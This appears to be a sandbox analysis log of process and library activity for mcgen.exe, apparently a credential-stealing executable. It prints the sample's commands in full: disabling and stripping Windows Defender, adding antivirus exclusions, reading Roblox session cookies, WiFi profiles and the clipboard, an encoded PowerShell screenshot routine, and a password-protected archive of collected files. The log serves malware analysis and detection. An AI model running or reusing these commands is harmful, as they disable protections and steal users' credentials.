              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Users\user\Desktop\mcgen.exe "C:\Users\user\Desktop\mcgen.exe"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\mcgen.exe""Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\mcgen.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8ED.tmp" "c:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: winmm.dllJump to behavior
